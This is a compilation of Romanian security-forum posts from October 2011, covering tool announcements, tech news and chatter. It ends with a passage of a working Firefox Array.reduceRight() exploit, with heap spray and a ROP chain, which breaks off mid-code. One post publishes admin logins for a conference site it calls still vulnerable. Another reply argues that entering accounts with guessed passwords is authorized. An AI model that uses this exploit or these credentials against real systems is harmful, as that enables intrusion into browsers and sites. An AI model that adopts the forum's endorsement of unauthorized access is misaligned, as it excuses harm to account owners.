Nytro

NPE File Analyzer View and Edit 32bit and 64bit Portable Executable (PE) Files NPE File Analyzer is a utility that allow users to view and edit 32bit and 64bit Portable Executable (PE) files, such as .EXE .DLL and .SYS files. NPE provides functions for inspection of unknown binaries, you can analyze sections, resources, import and export tables, relocations, TlsTable, and much more. It has a built-in process manager to analyze running processes and loaded modules. It is possible to fix a dumped file, realign file, extract PE(s) from a file, add code cave and compare PE files to check for differences in the PE structure. NPE can also generate MD5 hash, SHA1 hash and CRC32 hash of a file. It has full support for PEiD plugins and it has also a built-in hex editor that allows you to edit a file. Screenshots Features Add and Find Code Caves Add to Explorer Context Menu ASCII and UNICODE Strings Viewer Bound Import Viewer Change Icon (only 32-bit PEs supported) Compare PE Files Delay Import Viewer Edit 32bit and 64bit portable executables Export and Import Viewer Extract Portable Executable Files File Hasher (MD5 SH1 CRC32) File Location Calculator Full PEiD Plugin Compatibility Hex Editor Load Config Viewer PE Editor PE Section Viewer Processes and Modules Manager Remove Base Relocations Resource Viewer TimeDateStamp Adjuster TLS Editor Download: http://downloads.novirusthanks.org/files/npe_setup.exe Portable: http://downloads.novirusthanks.org/files/portables/npe_portable.zip Sursa: NPE File Analyzer - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks

Secure Android kernel could make for 'classified' smart phones By Henry Kenyon Oct 13, 2011 A research team from Google, George Mason University and the National Security Agency have developed a hardened kernel for the Android 3.0 operating system that could solve the problem of using smart phones in military operations and emergency response. The kernel, which is in the final stages of certification testing, opens the way for the Army to begin issuing smart phones or tablet-type wireless devices to troops in combat operations. The White House also is interested because the hardened kernel could help fulfill a government plan to create a secure national wireless network for first responders, Michael McCarthy, operations director of the Army's Brigade Modernization Command's Mission Command Complex, said at the AUSA Annual Meeting and Exposition in Washington on Oct. 10. McCarthy also heads the service's Connecting Soldiers to Digital Applications (CSDA) program, the lead organization involved in selecting handheld wireless technologies for military use. One of the problems vexing Army smart phones has been getting the right security accreditation to operate on military networks and eventually on classified networks. This is particularly important to allow smart phones to connect into battlefield networks, McCarthy said. The initial goal is to get the hardware and software accredited. "We have to have a way to verify the identity of the user of the smart phone. So it's a triple-level security measure that we have to deal with," he said. There were delays in getting the operating system accredited until NSA came forward several months ago and offered to expedite the approval process, McCarthy said. The new effort kicked off with a series of meetings with CSDA program personnel and representatives from NSA and the National Institute of Standards and Technology. The Android kernel is now being tested for a Federal Information Processing Standard 140-2 certification, which is expected by mid-October. "That's the first level of security that we've got to get before we start moving onto being able to ultimately do secret [communications]," he said. After the testing is complete, it is just a matter of filling out the certification paperwork, McCarthy said. "That is a game-changer for the security business because it then sets the conditions so that in the second quarter [late March 2012] they can do the certification of the Secure Sockets Layer, which then gives us the ability to operate at the classified levels," he said. In addition to the Army's plans to provide troops with smart phones, the Obama administration was attracted to the technology to support two of its initiatives. One is an effort by the White House Communications Office to move the executive branch from BlackBerry devices to Android-based phones. The reason is because Android devices with the new kernel can be secured at a higher clearance level than BlackBerry devices, McCarthy said. In June 2011, NSA approached McCarthy about working on the problem. The White House interest came from the Office of Science and Technology Policy, run by federal CTO Aneesh Chopra. "They had apparently been tracking the CSDA project on the Internet for several months, and they wanted me to come and give them a briefing," he said. McCarthy thought he was going to brief White House staffers, but instead he presented to Chopra, his deputy, senior representatives from the Justice Department and the FBI. The other, wider government interest tied into an ongoing White House initiative to create a secure, wireless national public safety infrastructure. The infrastructure would combine all of the nation’s public safety organizations into a secure wireless system, moving first responders away from radio-based systems. "It is potentially a multi-billion dollar effort," he said. Justice is the lead civilian agency working on the White House effort. There, the FBI and its scientists are the responsible for developing their version of CSDA. The FBI and Justice are also planning to conduct pilot projects, but on a larger scale than the Army, McCarthy said. One of the concerns behind the government's drive is that the radio communications networks used by federal, state and local response agencies are not very secure. This is a special concern for law enforcement and emergency response organizations’ operational channels, which could be subject to interception, spoofing and jamming. "They're looking at replacing radio with a smart phone," he said. Sursa: http://gcn.com/Articles/2011/10/11/AUSA-secure-andriod-kernel-technology.aspx

Heroes of the Computer Revolution by Steven Levy Hackers: Heroes of the Computer Revolution (ISBN 0-385-19195-2) is a book by Steven Levy about hacker culture. It was published in 1984 in Garden City, New York by Anchor Press/Doubleday. Levy describes the people, the machines, and the events that defined the Hacker Culture and the Hacker Ethic, from the early mainframe hackers at MIT, to the self-made hardware hackers and game hackers. Immediately following is a brief overview of the issues and ideas that are brought forward by Steven Levy's book, as well as a more detailed interpretation of each chapter of the book, mentioning some of the principal characters and events. The book saw an edition with a new afterword (entitled "Afterword: Ten Years After") by the author in 1994.[1] In 2010, a 25th anniversary edition with updated material was published by O'Reilly.[2] Download: http://www.dvara.net/HK/LevyStevenHackers1&2.pdf Informatii: Hackers: Heroes of the Computer Revolution - Wikipedia, the free encyclopedia Interesant de citit: http://en.wikipedia.org/wiki/Hacker_Ethic

Google shutdowns some products 10/14/2011 10:03:00 AM We aspire to build great products that really change people's lives, products they use two or three times a day. To succeed you need real focus and thought-thought about what you work on and, just as important, what you don’t work on. It's why we recently decided to shut down some products, and turn others into features of existing products. Here's the latest update on what's happening: Code Search, which was designed to help people search for open source code all over the web, will be shut down along with the Code Search API on January 15, 2012. In a few weeks we'll shut down Google Buzz and the Buzz API, and focus instead on Google+. While people obviously won't be able to create new posts after that, they will be able to view their existing content on their Google Profile, and download it using Google Takeout. Jaiku, a product we acquired in 2007 that let users send updates to friends, will shut down on January 15, 2012. We'll be working to enable users to export their data from Jaiku. Several years ago, we gave people the ability to interact socially on iGoogle. With our new focus on Google+, we will remove iGoogle's social features on January 15, 2012. iGoogle itself, and non-social iGoogle applications, will stay as they are. The University Research Program for Google Search, which provides API access to our search results for a small number of approved academic researchers, will close on January 15, 2012. In addition, later today the Google Labs site will shut down, and as previously announced, Boutiques.com and the former Like.com websites will be replaced by Google Product Search. Changing the world takes focus on the future, and honesty about the past. We learned a lot from products like Buzz, and are putting that learning to work every day in our vision for products like Google+. Our users expect great things from us; today’s announcements let us focus even more on giving them something truly awesome. Posted by Bradley Horowitz, Vice President, Product Sursa: http://googleblog.blogspot.com/2011/10/fall-sweep.html

Kindle source code Amazon is pleased to make available to you for download an archive file of the machine readable source code ("Source Code") corresponding to modified software packages used in the Kindle device. By downloading the Source Code, you agree to the following: AMAZON AND ITS AFFILIATES PROVIDE THE SOURCE CODE TO YOU ON AN "AS IS" BASIS WITHOUT REPRESENTATIONS OR WARRANTIES OF ANY KIND. YOU EXPRESSLY AGREE THAT YOUR USE OF THE SOURCE CODE IS AT YOUR SOLE RISK. TO THE FULL EXTENT PERMISSIBLE BY APPLICABLE LAW, AMAZON AND ITS AFFILIATES DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. AMAZON AND ITS AFFILIATES WILL NOT BE LIABLE FOR ANY DAMAGES OF ANY KIND ARISING FROM THE USE OF THE SOURCE CODE, INCLUDING, BUT NOT LIMITED TO DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, AND CONSEQUENTIAL DAMAGES. Click on the links below to download an archive file of the Kindle machine readable Source Code: Download: http://www.amazon.com/gp/help/customer/display.html?nodeId=200203720

Top 6 Dumbest Hacks of All Time By David Strom / October 10, 2011 Alan Wlasuk, CEO of 403 Web Security, has compiled a list of the top six dumbest hacks of all time. While hackers can be dangerous, Alan shows that not every hacker is a brilliant mastermind. Think of the always amusing Darwin Awards pictured in our icon at left. With many of these exploits, the hacker left unintended clues in their code to make them easier to be found. Late last year, Kelly Osborne (of Dancing With the Stars fame, no further comment) had her email account hacked. The hacker, wanting to not only look at all of her past emails new ones as well, had Kelly's emails forwarded to his own, personal email account. This seemed like a pretty easy trail to follow. Self proclaimed hacktivist Shahee Mirza and several associates defaced a Bangladesh government military website, Rapid Action Battalion, with the following message: "GOVERNMENT DOES NOT TAKE ANY STEP FOR ICT DEVELOPMENT. BUT PASSED A LAW ABOUT ANTI-CYBER CRIME. YOU DO NOT KNOW WHAT IS THE CYBER SECURITY OR HOW TO PROTECT OWNSELF. LISTEN. HACKERS R NOT CRIMINAL. THEY R 10 TIME BETTER THAN YOUR EXPERT. WE ARE GINIOUS THAN YOU CAN'T THINK. DEFACED FROM BANGLADESH." Unfortunately 21-year old Mirza also left the banner that clearly stated, "HACKED BY SHAHEE_MIRZA." Obviously not the "GINIOUS" indicated in his hack, Mirza may end up with 10 years in a Bangladesh federal prison. One can only imagine what the prisons are like in one of the poorest countries in the world. Famous for his Samy Worm, Samy Kamkar was responsible for a virus-like attack that infected over 1 million MySpace accounts in 2006. Amongst other malicious effects was the 'Samy is my hero' addition to the MySpace homepage of each of the million victims. As part of his obvious ego addition, Samy went on to boast of his hacking feat in a blog post. Unfortunately for Samy, the blog contained a picture of him with a license plate in the background, which was then used to find Samy. 20-year old Sayaka Fukuda had her iPhone stolen on the streets of New York City. The thief, Daquan Mathis, while enjoying his new iPhone took a picture of himself (dressed in the same clothes he wore during the mugging), which he then sent to his own email address. Unfortunately for Mathis, Fukuda's iPhone email account could be accessed on the Internet (like almost every such account). Given his email address it was a simple matter to track Mathis down, made even simpler by the fact the police had his picture. There are many stories about people tracking down their smartphones. By all accounts, Eduard Lucian Mandru is a very clever hacker. His 2006 hack of the U.S. Department of Defense (DOD) computer system went undetected for years, with the authorities only having Mandru's email address (wolfenstein_ingrid@yahoo.com) as their single clue. Mandru's downfall and arrest in 2009, however, came about when he used the same wolfenstein_ingrid@yahoo.com email address on the resume that he posted on numerous job boards. Sometimes it pays to use different email addresses for different tasks, don't you think? Alan was not sure if this hack is dumb or just really fun. One clever hacker realized that recent speed traps use cameras that automatically register your speed, take a picture of you license plate, and then use character recognition to translate you license plate number into something they can use as a lookup within the DMV database. With this in mind, he changed his license plate number to ('ZU 0666', 0, 0); Drop Database Table. If the DMV uses this string of characters in their database lookup it has a good chance of deleting all of the database records containing his actual license plate number, ZU 0666. This has got to be 10 out of 10 on the creativity scale, and once again showing the importance of knowing what SQL injection and little Bobby tables is all about. Sursa: http://www.readwriteweb.com/hack/2011/10/top-6-dumbest-hacks-of-all-tim.php

WLAN Security Megaprimer Download! We are happy to announce the general availability of the WLAN Security Megaprimer course DVD! ith over 40+ HD videos containing 12+ hours of Wireless Ownage, this DVD weighs in at around 4.2 Gigabytes! A quick breakdown of the course topics and associated videos is available here. We are now offering a certification - SecurityTube Wi-Fi Security Expert (SWSE) which uses this DVD as the courseware. Visit the Certifications page for more details! Core Course Material Download Links: 1. Mirror thanks to Mister_X from the Aircrack Team: http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso 2. Mirror thanks to Chaos Darmstadt: http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso 3. Mirror thanks to KokelNet.de (both IPv4 and IPv6!): http://securitytube.kokelnet.de/DVDs/WLAN-Security-Megaprimer-v1.iso 4. Mirror to the BofH of Nikhef (both IPv4 and IPv6!): http://wipkip.nikhef.nl/events/securitytube/DVD/WLAN-Security-Megaprimer-v1.iso 5. Mirror thanks to y0ug: http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso 6. Mirror thanks to Bernard from Insecure.co.nz : http://www.insecure.co.nz/WLAN-Security-Megaprimer-v1.iso 7. Mirror thanks to djekl : http://securitytube.djekl.co.uk/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso Torrents: 1. Torrent thanks to Christiaan Rakowski: http://csrakowski.dyndns.info/files/WLAN-Security-Megaprimer-v1.iso.torrent 2. Torrent thanks to Tobias Koopmann: http://tracker.kokelnet.de/torrents/WLAN-Security-Megaprimer-v1.iso.torrent MD5 Hash: 939d8aa5eb2cd0fa63295953ecf36580 Mai multe informatii: http://thehackernews.com/2011/10/swse-most-advanced-wi-fi-hacking-and.html Sursa: Megaprimers Download and Support

GateOne Beta - Terminal emulator for HTML5 web browsers Posted by THN Reporter On 10/14/2011 05:47:00 AM The software makes use of WebSockets to connect a server backend written in Python and a frontend written for modern browsers in JavaScript, HTML5 and CSS. The frontend doesn't require any browser plug-ins to be installed.Gate One also supports HTTP over SSL (https) secure connections from the browser to the server and authentication technologies such as Kerberos. It has its own internal plug-in system (plug-ins can be written in Python, JavaScript and CSS); currently available plug-ins for Gate One include SSH client connections, session recording and playback, and a bookmark manager for storing terminal sessions. Top features: * No browser plugins required! * Supports multiple simultaneous terminal sessions. As many as your hardware can handle. * Users can re-connect to their running terminals whenever they like from anywhere. * Can be embedded into other applications. Add a terminal--running whatever application(s) you want--to your web app! Would be vastly superior to say, a Java-based serial console applet (hint hint). * Includes powerful plugin system that supports plugins written in Python, JavaScript, and even CSS (yes, you can write a CSS-only plugin). * The Gate One server can be stopped & started without users losing their running terminal applications (even SSH sessions stay connected!). In essence, worry-free upgrades! * The SSH plugin allows users to duplicate sessions without having to re-enter their username and password (it re-uses the existing SSH tunnel). * Provides users with the ability to play back and save/share their terminal sessions via a self-contained HTML playback file. * Similarly, supports server-side logging, recording, and video-like playback of user sessions. It can even log to syslog to support whatever centralized logging system you want. * Keberos-based Single Sign-on support is included. It even works with Active Directory. Other authentication options are available as well. Download: https://github.com/liftoff/GateOne/downloads Sursa si demo: GateOne Beta - Terminal emulator for HTML5 web browsers ~ THN : The Hacker News

Hcon's Security Testing Framework (Hcon STF) v0.1beta Posted by THN Reporter On 10/13/2011 02:16:00 PM After the first demo of Hfox, many people asked about a Chromium based framework for penetration testing/ethical hacking. After 3 months of work and research, and some input from AJ, the following tool has been developed for the arsenal of Hcon’s tools: Specifications 1. Based on Chromium Source (iron build) version 14. 2. Works for ever need of hacking/penetration testing such as recon, enumeration, social engineering, exploitation, vulnerability assessment, anonymity, mobile tools, and reporting. 3. More secure and tracking free from Google and Stable than other Chromium-based builds. 4. Over 100 tools integrated with easy-to-use interface. 5. Tested and heavily modified tools with suggestions contributed by professional penetration testers, web developers and security researchers. 6. Free and open source software. 7. Totally portable (no need to install). You can carry it around in your USB storage, memory card, etc. 8. Runs on all Windows, including Windows XP, VISTA, 7 License : Many Free & open source licenses Contributers : Thanks to AJ's input to this project on UI changes. Official project page: http://www.hcon.in/hstf.html Main site : http://www.hcon.in/ Another project and based on firefox : Hfox v 0.3 http://www.hcon.in/hfox.html Sursa: http://thehackernews.com/2011/10/hcons-security-testing-framework-hcon.html

Operation Hackerazzi : FBI arrests alleged Hacker for Stealing naked photos of Hollywood stars Posted by THN Reporter On 10/13/2011 02:10:00 PM FEDERAL officials on Wednesday arrested a 35-year-old Florida man,Christopher Chaney and charged him with 26 counts of cyber-related crimes against Hollywood stars following an 11-month federal probe dubbed "Operation Hackerazzi". Twitter was ablaze earlier today with messages claiming to link to naked pictures of film actress Scarlett Johansson, which were allegedly stolen from her iPhone by a hacker earlier this year.The photographs may or may not be of Scarlett Johansson, but I would suggest that every hot-blooded male exercises some restraint as it's extremely possible that cybercriminals might exploit the interest to post dangerous links on the web designed to infect computers or steal information. To gain access to these email accounts, Chaney would search through details of celebrity lives within magazines as well as social media accounts like Twitter and figure out possible passwords. Once Chaney cracked the password, he would setup email forwarding to send a duplicate version of all emails to his personal account. This allowed Chaney to continue receiving emails after the password was reset. Gaining access to one account also allowed Chaney to access the address book and discover more celebrity email addresses. Chaney faces 26 counts of identity theft, unauthorized access to a protected computer and wiretapping. If convicted on all counts, Chaney could receive 121 years in prison for his crimes. Chaney was released on a $10,000 bond earlier today, but several restrictions are in place for the hacker. Chaney isn't allowed access to any computer or other device with Internet access and travel is restricted to the Middle District of Florida and Central District of California for trial purposes. Sursa: http://thehackernews.com/2011/10/operation-hackerazzi-fbi-arrests.html

NoSQL Author: Greg Burd Choosing between databases used to boil down to examining the differences between the available commercial and open source relational databases. The term "database" had become synonymous with SQL, and for a while not much else came close to being a viable solution for data storage. But recently there has been a shift in the database landscape. When considering options for data storage, there is a new game in town: NoSQL databases. In this article I'll introduce this new category of databases, examine where they came from and what they are good for, and help you understand whether you, too, should be considering a NoSQL solution in place of, or in addition to, your RDBMS database. What Is NoSQL? The only thing that all NoSQL solutions providers generally agree on is that the term "NoSQL" isn't perfect, but it is catchy. Most agree that the "no" stands for "not only"—an admission that the goal is not to reject SQL but, rather, to compensate for the technical limitations shared by the majority of relational database implementations. In fact, NoSQL is more a rejection of a particular software and hardware architecture for databases than of any single technology, language, or product. Relational databases evolved in a different era with different technological constraints, leading to a design that was optimal for the typical deployment prevalent at that time. But times have changed, and that once successful design is now a limitation. You might hear conversations suggesting that a better term for this category is NoRDBMS or half a dozen other labels, but the critical thing to remember is that NoSQL solutions started off with a different set of goals and evolved in a different environment, and so they are operationally different and, arguably, provide bettersuited solutions for many of today's data storage problems. Articol: http://www.usenix.org/publications/login/2011-10/openpdfs/Burd.pdf

AnDOSid - DOS testing tool for Android The rise of groups like Anonymous and LuzSec, as well as constant India / Pakistan cyberwar has raised the issue of cyber-security high(er) in the minds of web owners. Security tools exist to simulate such attacks and help website security people defend against them, however for the most part they currently only exist for desktop computers. Mobile phones have, over the last few years, grown from simple devices that send and receive calls to mobile computing platforms which can be purchased for less than $100 a device. AnDOSid fills that gap, allowing security professionals to simulate a DOS attack (An http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. However it also transmits both the phones IMEI and the android ID to prevent it\'s use by malicious people. AnDOSid is designed for security professionals only! AnDOSid tag's posts with two unique numbers which relate to the Android device that sent the request. AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. AnDOSid is actively being developed and feedback is welcomed from the security community as to how you would like the application to evolve. SCOTT HERBERT Developed this Tool for Android and it is designed for Security Professionals/PenTesters. Some possible new features could include: A drop down list of recent targets User defined delay between posts An option for GET based testing And this tool can be downloaded from the below link which costs just 1L. https://market.android.com/details?id=com.scott.herbert.AnDOSid Sursa: http://www.computingtweaks.com/2011/10/andosid-dos-testing-tool-for-android.html

From C to C++: A quick reference for aging programmers So you were a great system programmer, back in the old days; your low level programs were celebrated by clever people, you loved C pointers and some days even considered Assembler as an option. You were happy and self-confident. But somehow you screwed something, got trapped in a time vortex and you ended today, trying to maintain or develop a program using that pesky Object Oriented Programming model in something called C++. I understand you; follow this guide and learn a bunch of things that will put you out of your misery and understand this brave new world. Structs Classes Encapsulation Constructors and destructors This Inheritance Virtual methods Overloading Function and method overloading Operator overloading References Exceptions Templates Other features Default values for function arguments New and delete See also Articol: http://triptico.com/docs/c2cpp.html

Nu am acces sa pot pune chat, iar de kwe nici eu nu prea mai dau. Lucram, ajungem acasa tarziu, si dupa 8 ore la munca in fata calculatorului nu iti mai vine sa stai inca 2-3 acasa, mai ales ca la munca cel putin iese un ban. Voi discuta cu kwe, cand dau de el.

Vom reveni.

Hands On: Windows 8 HTML5 Platform Teste cu diverse "jucarii" CSS3: animatii, transparenta, gradient, transformari 3D, multe lucruri interesante de testat, cu codul afisat alaturi. http://ie.microsoft.com/testdrive/Graphics/hands-on-css3/

Sunt eu, anul II, dar nu prea dau pe la facultate.

E important?

VIDEO: Android Ice Cream Sandwich va fi lansat la 19 octombrie de Radu Eftimie | 14 octombrie 2011 Samsung si Google au anuntat oficial ca lansarea Ice Cream Sandwich va avea loc in data de 19 octombrie, adica peste mai putin de o saptamana. Zvonurile privind data lansarii Android ICS (Ice Cream Sandwich) si a telefonului Nexus Prime de la Samsung au fost confirmate chiar de catre cele doua companii care au trimis deja invitatii pentru evenimentul din 19 octombrie. Si - apropo de invitatii - se pare ca Google a imprumutat din practica Apple de a trimite o invitatie cu skepsis si de a mentine misterul asupra ceea ce urmeaza sa se intample la eveniment. Invitatia nu face referire la lansarea ICS decat printr-o imagine a mascotei noului sistem de operare. Lansarea Android va fi transmisa prin live streaming pe canalul YouTube al sistemului de operare. Ieri, Google a montat in campusul companiei, ce-a de-a cincea mascota Android, cea a Ice Cream Sandwich. Lansarea Android 4 si a telefonului Nexus Prime, stabilita initial pentru 11 octombrie, a fost amanata de Google si Samsung imediat dupa moartea lui Steve Jobs. Sursa si video: VIDEO: Android Ice Cream Sandwich va fi lansat la 19 octombrie | Hit.ro

Canonical a lansat Ubuntu 11.10 Oneiric Ocelot de Radu Eftimie | 14 octombrie 2011 Canonical a anuntat, ieri, lansarea unei noi versiuni a celui mai popular sistem de operare open source, Ubuntu 11.10. Desi nu aduce schimbari mari din punct de vedere grafic fata de versiunea anterioara (Ubuntu 1.04 si derivatele sale), noua distributie pare a imbunatatita. Ubuntu 11.10 vine cu o versiune imbunatatita a interfetei sale grafice, Unity, (prezentata in premiera in varianta precedenta a sistemului de operare). Desi este prea devreme pentru a putea puncta in mod obiectiv evolutia noului Ubuntu, se pare ca acesta versiune a obtinut in teste rezultate mai bune in raport cu Ubuntu 11.04. De amintit este ca utilizatorii curiosi sa testeze noua distributie Ubuntu au la dispozitie programul Wubi care le permite sa instaleze sistemul de operare al Canonical direct in Windows, fara sa pericliteze in vreun fel integritatea partitiilor de pe hard disk. Ubuntu 11.10 vine insotit, ca si celelalte variante anterioare, de mai multe programe utile, precum o suita office open source, browserul Firefox sau Chrome, Skype si alte pachete. Sursa: Canonical a lansat Ubuntu 11.10 Oneiric Ocelot | Hit.ro

Probabil a ghicit parolele. Iar accesul folosind un nume de utilizator si o parola NU E NEAUTORIZAT. E autorizat tocmai prin acea parola simpla, pentru care de vina e posesorul ratat. Deci, inca o data, muie autoritatilor.

Prezentari "Forumul securitatii IT" Detalii aici: http://rstcenter.com/forum/41142-cica-forumul-securitatii-pe-11-octombrie.rst Prezentarile sunt descarcate de pe site. 13-Oct-11 12:53 PM 1,080,510 Adrian Furtuna.pdf 13-Oct-11 12:53 PM 3,130,880 Alexandru Catalin COSOI.ppt 13-Oct-11 12:53 PM 4,633,088 Alexandru Negrea.ppt 13-Oct-11 12:53 PM 12,342,784 Bogdan Toporan.ppt 13-Oct-11 12:53 PM 10,486,234 Costin Pecingina.pptm 13-Oct-11 12:53 PM 8,118,784 Doru Manea.ppt 13-Oct-11 12:53 PM 1,335,798 Fermin Catalan Ramos.pptx 13-Oct-11 12:53 PM 499,079 Gabriel Mihai Tanase.pdf 13-Oct-11 12:53 PM 2,410,811 Gidon Pely.pptx 13-Oct-11 12:53 PM 1,119,846 Kemal Ozmen.pdf 13-Oct-11 12:54 PM 3,389,718 Radu Herinean.pptx 13-Oct-11 12:54 PM 1,566,720 Razvan Grigorescu.ppt 13-Oct-11 12:54 PM 418,304 Tofan Dan.ppt 13 File(s) 50,532,556 bytes Download: http://www.fileshare.ro/30982997771 http://www.girlshare.ro/2738230 http://www30.zippyshare.com/v/60113036/file.html Site-ul este inca vulnerabil, nu au facut decat sa stearga toti utilizatorii, cu exceptia: User: admin Parola: admin Care este un cont normal, si: User: conferinte Parola: Fara parola, lasati necompletat Logare: Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMedia Cu care puteti intra in panoul de administrare. Se pare ca azi au sters si pagina de administrare: The requested URL /conferences/admin.php was not found on this server. Legat de ce a fost acolo, nu cred ca are rost sa comentez. Pare-mi-se ca firmele de antivirus isi lauda produsele, si se tot compara intre ele , cei care au firme de securitate tot prezinta niste rahaturi pur teoretice si inutile si tot asa. Ei spun ca stiu cum actioneaza "hackerii" (termen folosit de ei cu sens de "criminal cibernetic"), ei identificandu-se ca fiind un fel de "politie virtuala", ca fiind baieti buni. Pretind ca stiu cum se actioneaza, dar pana la urma... "Nu pune un politist sa faca treaba unui hot".

Cel mai usor laptop din lume e unul romanesc! De la Evolio de Radu Eftimie | 12 octombrie 2011 Are doar 980 de grame, ceea ce il face mai usor decat MacBook Air cu o suta de grame. Se numeste U9, dar, mai presus de toate, este produs de compania romanesca Evolio si este cel mai usor ultrabook din lume. Oficial: Evolio lanseaza U9, cel mai usor notebook din lume Potrivit producatorului Evolio, laptopul care bate Macbook Air-ul la portabilitate va ajunge pe piata in luna decembrie. Evolio U9 dispune de un procesor Intel Atom Dual-Core (1,6 GHz), are 2GB RAM (DDR3) si un spatiu de stocare de 128GB (SSD). Ecranul laptopului Evolio masoara 29,5 cm si are o rezolutie de 1366x768 pixeli. Laptopul este echipat cu tehnologia de accelerare grafica "PowerVR Core", ce permite rularea tuturor formatelor video Full HD: (BlueRay, Mpeg2, Mpeg4, WMv9, H.264) si proiectarea acestora pe un televizor sau display extern prin intermediul interfetei HDMI. Portabilul mai este dotat cu o camera video de 1,3 MP. Noul laptop romanesc ce vrea sa detroneze MacBook Air-ul Apple, va costa 450 de euro (TVA inclus) si va ajunge in magazine in apropierea sarbatorilor de iarna. Sursa: Cel mai usor laptop din lume e unul romanesc! De la Evolio | Hit.ro

RIP Dennis Ritchie, 1941-2011: Computer scientist, Unix co-creator, C programming lan By Xeni Jardin at 7:19 pm Wednesday, Oct 12 Computer scientist Dennis Ritchie is reported to have died at his home this past weekend, after a long battle against an unspecified illness. No further details are available at the time of this blog post. Wikipedia biography here. He was the designer and original developer of the C programming language, and a central figure in the development of Unix. He spent much of his career at Bell Labs. He was awarded the Turing Award in 1983, and the National Medal of Technology in 1999. "Ritchie's influence rivals Jobs's; it's just less visible," James Grimmelman observed on Twitter. "His pointer has been cast to void *; his process has terminated with exit code 0." The news of Ritchie's death was first made public by way of Rob Pike's Google+. Photo, below: Candlelight vigil for Dennis M. Ritchie. (thanks, Kevin) Wiki: http://en.wikipedia.org/wiki/Dennis_Ritchie Sursa: http://boingboing.net/2011/10/12/dennis-ritchie-1941-2011-computer-scientist-unix-co-creator-c-co-inventor.html Pfffffff, dupa parerea mea, un om mult mai important in IT decat Steve Jobs.

Mozilla Firefox Array.reduceRight() Integer Overflow Exploit # Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit # Date: 12 Oct 2011 # Author: Matteo Memelli ryujin -AT- offensive-security.com # CVE-2011-2371 # Full exploit package: http://www.exploit-db.com/sploits/17974.zip <html> <head> <title>ff-i-<3-u</title> </head> <body> <center> <br /> Title: Mozilla Firefox Array.reduceRight() Integer Overflow Exploit<br /> Date: 12 Oct 2011<br /> Author: Matteo Memelli ryujin -AT- offensive-security.com<br /> CVE-2011-2371<br /> Full exploit package: <br /> http://www.exploit-db.com/sploits/17974.zip <br /> <br /> Thx to dookie for helping <br/> Vulnerability discovered by Chris Rohlf and Yan Ivnitskiy of Matasano Security<br /> http://www.mozilla.org/security/announce/2011/mfsa2011-22.html<br/> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371<br/> DEP / ASLR bypassing through JAVA MSVCR71 sayonara rop chain<br/> Tested on Windows 7 Ultimate / firefox 3.6.16 and 3.6.17<br/><br/> <APPLET id="MyApplet" code="ph33r.class" width=150 height=50> You need a Java-enabled browser to pwn this. </APPLET> </center> <script type="text/javascript"> var applet = document.getElementById('MyApplet'); function spray() { // fake object pointers var ptrs = unescape("%u4141" + // padding // MOV EDX,DWORD[ESI] 0c000048=0c00007c "%u0048%u0c00" + "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141" + // padding // PIVOT MSVCR71.dll 0x7C370EEF LEA ESP,[ESI-3] // RETN 1C75 "%u0EEF%u7C37" + "%u4141%u4141" + // padding "%u4141" + // padding "%u240c%u3410" + // 3410240c RETN after PIVOT "%u007c%u0c00" + // 0c00007c PTR TO END OF BUFFER "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u4141%u4141" + // padding "%u002e%u0c00"); // 0c00007c -> 0c00002e // CALL PIVOT 0x7C370EEF var bheader = 0x12/2; // u.n.d.e.f.i.n.e.d. string // beginning of each array element var nullt = 0x2/2; // string null terminator // 0:000> ? 0c001cbe - 0c000012 // Evaluate expression: 7340 = 00001cac var espoffset = (7340 /2) - ptrs.length; var esppadding = unescape("%u0c0c%u0c0c"); while(esppadding.length < espoffset) {esppadding += esppadding;} esppadding = esppadding.substring(0, espoffset); // sayonara rop chain rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push esp;ret; rop += unescape("%ubc90%u0c0c%u0c0c"); // 